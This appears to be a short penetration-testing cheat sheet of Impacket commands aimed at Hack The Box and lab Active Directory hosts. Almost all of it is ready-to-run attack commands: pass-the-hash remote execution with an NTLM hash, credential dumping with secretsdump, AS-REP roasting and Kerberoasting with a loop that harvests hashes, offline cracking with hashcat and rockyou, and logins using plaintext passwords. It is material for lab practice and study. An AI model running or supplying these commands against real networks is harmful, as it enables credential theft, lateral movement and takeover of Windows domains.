Impacket

Impacket-Psexec

impacket-psexec administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

impacket-secretsdump htb/john@10.10.10.161

impacket-GetADUsers egotistical-bank.local/ -dc-ip 10.10.10.175 -debug

impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.10.10.100

Listing SPN Accounts

impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass

impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100

Requesting all TGS Tickets

impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100 -request

Requesting a Single TGS ticket

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Saving the TGS Ticket to an Output File

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

while read p; do GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.10.10.175 >> hash.txt; done < unames.txt

Cracking the Ticket Offline with Hashcat

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt

impacket-wmiexec active.htb/administrator:Ticketmaster1968@10.10.10.100

impacket-smbserver -smb2support smb -username test -password test $(pwd)

impacket-mssqlclient -db POO_PUBLIC intranet.poo/external_user:p00Public3@10.13.38.11

Last updated 9 months ago